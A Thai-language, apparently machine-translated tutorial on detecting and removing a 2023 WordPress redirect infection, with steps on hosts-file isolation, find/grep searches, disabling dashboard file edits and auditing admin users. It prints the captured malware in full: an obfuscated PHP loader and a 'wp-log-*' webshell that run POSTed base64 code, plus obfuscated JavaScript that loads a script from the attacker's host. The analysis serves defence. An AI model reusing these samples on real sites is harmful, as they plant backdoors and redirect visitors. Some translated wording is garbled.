Fix Redirect WordPress Hack 2023 (ไวรัสเปลี่ยนเส้นทาง)

WordPress เป็นแพลตฟอร์มที่มีคนใช้มากที่สุดอย่างแน่นอน CMS (Content Management System) สำหรับทั้งบล็อกและร้านค้าออนไลน์เริ่มต้น (พร้อมโมดูล WooCommerce) ซึ่งทำให้ตกเป็นเป้าหมายของการโจมตีทางคอมพิวเตอร์ (การแฮ็ก) มากที่สุด หนึ่งในการดำเนินการแฮ็คที่ใช้มากที่สุดมีเป้าหมายเพื่อเปลี่ยนเส้นทางเว็บไซต์ที่ถูกบุกรุกไปยังหน้าเว็บอื่น Redirect WordPress Hack 2023 เป็นมัลแวร์ที่ค่อนข้างใหม่ซึ่งมีผลกระทบในการเปลี่ยนเส้นทางเว็บไซต์ทั้งหมดไปยังหน้าเว็บที่เป็นสแปม หรืออาจทำให้คอมพิวเตอร์ของผู้ใช้ติดไวรัสได้

หากเว็บไซต์ของคุณพัฒนาบน WordPress ถูกเปลี่ยนเส้นทางไปยังไซต์อื่น มีแนวโน้มว่าจะตกเป็นเหยื่อของการแฮ็กการเปลี่ยนเส้นทางที่มีชื่อเสียงอยู่แล้ว

ในบทช่วยสอนนี้ คุณจะพบข้อมูลที่จำเป็นและคำแนะนำที่เป็นประโยชน์ซึ่งคุณสามารถกำจัดไวรัสของเว็บไซต์ที่ติดไวรัสด้วยการเปลี่ยนเส้นทางได้ WordPress Hack (Virus Redirect). คุณสามารถรับข้อมูลเพิ่มเติมหรือขอความช่วยเหลือผ่านความคิดเห็น

การตรวจจับไวรัสที่เปลี่ยนเส้นทางไซต์ Wordข่าวประชาสัมพันธ์

การลดลงอย่างกะทันหันและไม่ยุติธรรมของการเข้าชมเว็บไซต์ จำนวนคำสั่งซื้อที่ลดลง (ในกรณีของร้านค้าออนไลน์) หรือรายได้จากการโฆษณาเป็นสัญญาณแรกว่ามีบางอย่างผิดปกติ ตรวจจับ "Redirect WordPress Hack 2023” (Virus Redirect) ยังสามารถทำได้แบบ “มองเห็น” เมื่อคุณเปิดเว็บไซต์และคุณถูกเปลี่ยนเส้นทางไปยังหน้าเว็บอื่น

จากประสบการณ์ มัลแวร์เว็บส่วนใหญ่เข้ากันได้กับอินเทอร์เน็ตเบราว์เซอร์: Chrome, Firefox, Edge, Opera. หากคุณเป็นผู้ใช้คอมพิวเตอร์ Macไวรัสเหล่านี้ไม่สามารถมองเห็นได้ในเบราว์เซอร์ Safari. ระบบรักษาความปลอดภัยจาก Safari บล็อกสคริปต์ที่เป็นอันตรายเหล่านี้อย่างเงียบ ๆ

จะทำอย่างไรถ้าคุณมีเว็บไซต์ที่ติดไวรัส Redirect WordPress Hack

ฉันหวังว่าขั้นตอนแรกจะไม่ตื่นตระหนกหรือลบเว็บไซต์ แม้แต่ไฟล์ที่ติดไวรัสหรือไวรัสก็ไม่ควรลบออกในตอนแรก ประกอบด้วยข้อมูลอันมีค่าที่สามารถช่วยให้คุณเข้าใจว่าการละเมิดความปลอดภัยอยู่ที่ไหนและสิ่งใดที่ส่งผลต่อไวรัส วิธีการดำเนินการ

ปิดเว็บไซต์เป็นสาธารณะ

คุณจะปิดเว็บไซต์ไวรัสสำหรับผู้เยี่ยมชมได้อย่างไร? วิธีที่ง่ายที่สุดคือการใช้ตัวจัดการ DNS และลบ IP สำหรับ "A" (ชื่อโดเมน) หรือกำหนด IP ที่ไม่มีอยู่จริง ดังนั้นผู้เยี่ยมชมเว็บไซต์จะได้รับการปกป้องจากการเปลี่ยนเส้นทางนี้ WordPress แฮ็คที่สามารถนำพวกเขาไปสู่ไวรัสหรือหน้าเว็บสแปม

ถ้าคุณใช้ CloudFlare ในฐานะผู้จัดการ DNS คุณลงชื่อเข้าใช้บัญชีและลบระเบียน DNS "A” สำหรับชื่อโดเมน ดังนั้นโดเมนที่ได้รับผลกระทบจากไวรัสจะยังคงอยู่โดยไม่มี IP และไม่สามารถเข้าถึงได้จากอินเทอร์เน็ตอีกต่อไป

คุณคัดลอก IP ของเว็บไซต์และ "กำหนดเส้นทาง" เพื่อให้มีเพียงคุณเท่านั้นที่สามารถเข้าถึงได้ จากคอมพิวเตอร์ของคุณ

วิธีเปลี่ยน IP จริงของเว็บไซต์บนคอมพิวเตอร์ Windows?

วิธีนี้มักใช้เพื่อบล็อกการเข้าถึงบางเว็บไซต์โดยแก้ไขไฟล์ "โฮสต์"

1. คุณเปิด Notepad หรือโปรแกรมแก้ไขข้อความอื่น (พร้อมสิทธิ์ผู้ดูแลระบบ) และแก้ไขไฟล์ "hosts". ตั้งอยู่ใน:

C:\Windows\System32\drivers\etc\hosts

2. ในไฟล์ "โฮสต์" เพิ่ม "เส้นทาง" ให้กับ IP จริงของเว็บไซต์ของคุณ IP ลบด้านบนจากตัวจัดการ DNS

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. บันทึกไฟล์และเข้าถึงเว็บไซต์ในเบราว์เซอร์

หากเว็บไซต์ไม่เปิดขึ้นและคุณไม่ได้ทำอะไรผิดในไฟล์ "hosts" เป็นไปได้มากว่าแคช DNS

เพื่อล้างแคช DNS บนระบบปฏิบัติการ Windows, เปิด Command Promptที่คุณเรียกใช้คำสั่ง:

ipconfig /flushdns

วิธีเปลี่ยน IP จริงของเว็บไซต์บนคอมพิวเตอร์ Mac / Macหนังสือ?

สำหรับผู้ใช้คอมพิวเตอร์ Mac การเปลี่ยน IP จริงของเว็บไซต์ค่อนข้างง่ายกว่า

1. เปิดยูทิลิตี้ Terminal.

2. เรียกใช้บรรทัดคำสั่ง (ต้องใช้รหัสผ่านระบบเพื่อเรียกใช้):

sudo nano /etc/hosts

3. เช่นเดียวกับคอมพิวเตอร์ Windowsเพิ่ม IP จริงของโดเมน

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. บันทึกการเปลี่ยนแปลง Ctrl+X (y).

หลังจากที่คุณ "กำหนดเส้นทาง" แล้ว คุณเป็นคนเดียวที่สามารถเข้าถึงเว็บไซต์ที่ติดไวรัสได้ Redirect WordPress Hack.

การสำรองข้อมูลเว็บไซต์แบบเต็ม – ไฟล์และฐานข้อมูล

แม้ว่ามันจะติด "การเปลี่ยนเส้นทาง WordPress hack" คำแนะนำคือให้สำรองข้อมูลทั่วไปของเว็บไซต์ทั้งหมด ไฟล์และฐานข้อมูล อาจเป็นไปได้ว่าคุณสามารถบันทึกสำเนาในเครื่องของทั้งสองไฟล์ได้ public / public_html ตลอดจนฐานข้อมูล

การระบุไฟล์ที่ติดไวรัสและไฟล์ที่ถูกแก้ไขโดย Redirect WordPress Hack 2023

ไฟล์เป้าหมายหลักของ Wordข่าวประชาสัมพันธ์ มี index.php (ในราก), header.php, index.php şi footer.php ของธีม WordPress สินทรัพย์ ตรวจสอบไฟล์เหล่านี้ด้วยตนเองและระบุรหัสที่เป็นอันตรายหรือสคริปต์มัลแวร์

ในปี 2023 ไวรัสของ “Redirect WordPress Hack"ใส่ค่ะ index.php รหัสของแบบฟอร์ม:

(ฉันไม่แนะนำให้ใช้รหัสเหล่านี้!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

ถอดรหัสนี้ สคริปต์ที่เป็นอันตราย โดยพื้นฐานแล้วเป็นผลมาจากการที่เว็บไซต์ติดไวรัส Wordกด. ไม่ใช่สคริปต์ที่อยู่เบื้องหลังแอปพลิเคชันมัลแวร์ แต่เป็นสคริปต์ที่ทำให้สามารถเปลี่ยนเส้นทางไปยังเว็บเพจที่ติดไวรัสได้ หากเราถอดรหัสสคริปต์ด้านบนเราจะได้:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

หากต้องการระบุไฟล์ทั้งหมดบนเซิร์ฟเวอร์ที่มีรหัสนี้ คุณควรมีสิทธิ์เข้าถึง SSH ไปยังเซิร์ฟเวอร์เพื่อเรียกใช้การตรวจสอบไฟล์และบรรทัดคำสั่งการจัดการ Linux.

ที่เกี่ยวข้อง จะทราบได้อย่างไรว่าบล็อกของคุณติดไวรัสหรือไม่ ด้วยความช่วยเหลือ Google Search . (WordPress ไวรัส)

ด้านล่างนี้คือคำสั่งสองคำสั่งที่มีประโยชน์อย่างยิ่งในการระบุไฟล์และไฟล์ที่แก้ไขล่าสุดซึ่งมีรหัส (สตริง) บางอย่าง

คุณเห็นได้อย่างไร Linux ไฟล์ PHP มีการเปลี่ยนแปลงใน 24 ชั่วโมงที่ผ่านมาหรือกรอบเวลาอื่นหรือไม่

สั่งซื้อ “find” ใช้งานง่ายมากและอนุญาตให้ปรับแต่งเพื่อกำหนดช่วงเวลา เส้นทางการค้นหา และประเภทของไฟล์

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

ในเอาต์พุต คุณจะได้รับข้อมูลเกี่ยวกับวันที่และเวลาที่แก้ไขไฟล์ สิทธิ์เขียน / อ่าน / ดำเนินการ (chmod) และอยู่ในกลุ่ม/ผู้ใช้ใด

หากต้องการตรวจสอบวันที่ผ่านมาให้เปลี่ยนค่า "-mtime -1” หรือใช้ “-mmin -360” เป็นนาที (6 ชั่วโมง)

จะค้นหารหัส (สตริง) ภายในไฟล์ PHP, Java ได้อย่างไร

บรรทัดคำสั่ง "find" ที่ช่วยให้คุณสามารถค้นหาไฟล์ PHP หรือ Java ทั้งหมดที่มีรหัสบางอย่างได้อย่างรวดเร็วมีดังนี้:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

คำสั่งจะค้นหาและแสดงไฟล์ .php şi .js ที่มี "uJjBRODYsU"

ด้วยความช่วยเหลือของสองคำสั่งข้างต้น คุณจะพบได้อย่างง่ายดายว่าไฟล์ใดได้รับการแก้ไขเมื่อเร็วๆ นี้ และไฟล์ใดมีโค้ดมัลแวร์

ลบรหัสที่เป็นอันตรายออกจากไฟล์ที่แก้ไขโดยไม่สูญเสียรหัสที่ถูกต้อง ในสถานการณ์ของฉัน มัลแวร์ถูกวางก่อนที่จะเปิด <head>.

เมื่อรันคำสั่ง "find" คำสั่งแรก เป็นไปได้มากที่จะค้นพบไฟล์ใหม่บนเซิร์ฟเวอร์ ซึ่งไม่ใช่ของคุณ WordPress หรือใส่โดยคุณ ไฟล์ที่อยู่ในประเภทของไวรัส Redirect WordPress Hack.

ในสถานการณ์ที่ฉันตรวจสอบ ไฟล์ในรูปแบบ “wp-log-nOXdgD.php". ไฟล์เหล่านี้คือไฟล์ "spawn" ที่มีโค้ดมัลแวร์ที่ไวรัสใช้ในการเปลี่ยนเส้นทาง

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

วัตถุประสงค์ของไฟล์ประเภท "wp-log-*” คือการแพร่กระจายไวรัสแฮ็คการเปลี่ยนเส้นทางไปยังเว็บไซต์อื่น ๆ ที่โฮสต์บนเซิร์ฟเวอร์ เป็นรหัสมัลแวร์ประเภท “webshell” ประกอบด้วย ส่วนพื้นฐาน (ซึ่งมีการกำหนดตัวแปรเข้ารหัสบางตัว) และ o ส่วนการดำเนินการ ซึ่งผู้โจมตีพยายามโหลดและเรียกใช้รหัสที่เป็นอันตรายบนระบบ

หากมีตัวแปร POST ชื่อ 'bh' และค่าที่เข้ารหัส MD5 เท่ากับ "8f1f964a4b4d8d1ac3f0386693d28d03" จากนั้นสคริปต์จะปรากฏขึ้นเพื่อเขียนเนื้อหาที่เข้ารหัส base64 ของตัวแปรอื่นที่เรียกว่า 'b3' ในไฟล์ชั่วคราว จากนั้นพยายามรวมไฟล์ชั่วคราวนี้

หากมีตัวแปร POST หรือ GET ชื่อ 'tick' สคริปต์จะตอบกลับด้วยค่า MD5 ของสตริง "885"

ในการระบุไฟล์ทั้งหมดบนเซิร์ฟเวอร์ที่มีโค้ดนี้ ให้เลือกสตริงที่ใช้ร่วมกัน จากนั้นเรียกใช้คำสั่ง “find” (คล้ายกับด้านบน) ลบไฟล์ทั้งหมดที่มีรหัสมัลแวร์นี้.

ข้อบกพร่องด้านความปลอดภัยถูกโจมตีโดย Redirect WordPress Hack

ส่วนใหญ่ไวรัสเปลี่ยนเส้นทางนี้มาถึงทาง การแสวงหาผลประโยชน์ของผู้ใช้การบริหาร Wordข่าวประชาสัมพันธ์ หรือโดยการระบุก ปลั๊กอินที่มีช่องโหว่ ซึ่งอนุญาตให้เพิ่มผู้ใช้ที่มีสิทธิ์ของผู้ดูแลระบบ

สำหรับเว็บไซต์ส่วนใหญ่ที่สร้างบนแพลตฟอร์ม WordPress มันเป็นไปได้ แก้ไขไฟล์ธีมหรือปลั๊กอินจากอินเทอร์เฟซการดูแลระบบ (Dashboard). ดังนั้น ผู้ประสงค์ร้ายสามารถเพิ่มโค้ดมัลแวร์ลงในไฟล์ธีมเพื่อสร้างสคริปต์ที่แสดงด้านบน

ตัวอย่างของรหัสมัลแวร์ดังกล่าวคือ:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript ระบุไว้ในส่วนหัวของธีม Wordกดทันทีหลังจากเปิดฉลาก <head>.

ค่อนข้างยากที่จะถอดรหัส JavaScript นี้ แต่เห็นได้ชัดว่ามันสอบถามที่อยู่เว็บอื่นซึ่งมักจะเรียกสคริปต์อื่นเพื่อสร้างไฟล์ "wp-log-*” ที่ฉันพูดถึงข้างต้น

ค้นหาและลบรหัสนี้ออกจากไฟล์ทั้งหมด PHP ได้รับผลกระทบ

เท่าที่ฉันสามารถบอกได้ว่ารหัสนี้คือ เพิ่มด้วยตนเอง โดยผู้ใช้ใหม่ที่มีสิทธิ์ระดับผู้ดูแลระบบ

ดังนั้น เพื่อป้องกันการเพิ่มมัลแวร์จากแดชบอร์ด วิธีที่ดีที่สุดคือปิดใช้งานตัวเลือกในการแก้ไข WordPress ธีม / ปลั๊กอินจากแดชบอร์ด

แก้ไขไฟล์ wp-config.php และเพิ่มบรรทัด:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

หลังจากทำการเปลี่ยนแปลงนี้ ไม่มีผู้ใช้ WordPress คุณจะไม่สามารถแก้ไขไฟล์จากแดชบอร์ดได้อีกต่อไป

ตรวจสอบผู้ใช้ด้วยบทบาทของ Administrator

ด้านล่างนี้คือแบบสอบถาม SQL ที่คุณสามารถใช้เพื่อค้นหาผู้ใช้ที่เป็นผู้ดูแลระบบในแพลตฟอร์ม Wordกด:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

ข้อความค้นหานี้จะส่งคืนผู้ใช้ทั้งหมดในตาราง wp_users ที่ได้รับมอบหมายบทบาทผู้ดูแลระบบ แบบสอบถามเสร็จสิ้นแล้วสำหรับตารางด้วย wp_usermeta เพื่อค้นหาในเมตา 'wp_capabilities' ซึ่งมีข้อมูลเกี่ยวกับบทบาทของผู้ใช้

อีกวิธีหนึ่งคือการระบุจาก: Dashboard → Users → All Users → Administrator. อย่างไรก็ตาม มีวิธีปฏิบัติที่สามารถซ่อนผู้ใช้ในแผงแดชบอร์ดได้ ดังนั้นวิธีที่ดีที่สุดในการมองเห็นผู้ใช้ "Administrator"ใน WordPress เป็นคำสั่ง SQL ด้านบน

ในกรณีของฉัน ฉันระบุผู้ใช้ในฐานข้อมูลด้วยชื่อ "wp-import-user". ชี้นำค่อนข้างมาก

นอกจากนี้ คุณสามารถดูวันที่และเวลาของผู้ใช้ได้จากที่นี่ WordPress ถูกสร้าง. ID ผู้ใช้มีความสำคัญมากเช่นกัน เนื่องจากจะค้นหาบันทึกของเซิร์ฟเวอร์ ด้วยวิธีนี้ คุณสามารถดูกิจกรรมทั้งหมดของผู้ใช้รายนี้

ลบผู้ใช้ที่มีบทบาทผู้ดูแลระบบ ซึ่งคุณไม่รู้แล้ว เปลี่ยนรหัสผ่าน สำหรับผู้ใช้ที่เป็นผู้ดูแลระบบทั้งหมด บรรณาธิการ ผู้เขียน Administrator.

เปลี่ยนรหัสผ่านของผู้ใช้ฐานข้อมูล SQL ของเว็บไซต์ที่ได้รับผลกระทบ

หลังจากทำตามขั้นตอนเหล่านี้แล้ว ผู้ใช้ทุกคนจะสามารถเริ่มต้นเว็บไซต์ใหม่ได้

อย่างไรก็ตาม โปรดจำไว้ว่าสิ่งที่ฉันนำเสนอข้างต้นอาจเป็นหนึ่งในหลายพันสถานการณ์ที่เว็บไซต์ติดไวรัส Redirect WordPress Hack ในปี 2023

หากเว็บไซต์ของคุณติดไวรัสและคุณต้องการความช่วยเหลือหรือหากคุณมีคำถามใดๆ ส่วนความคิดเห็นจะเปิดอยู่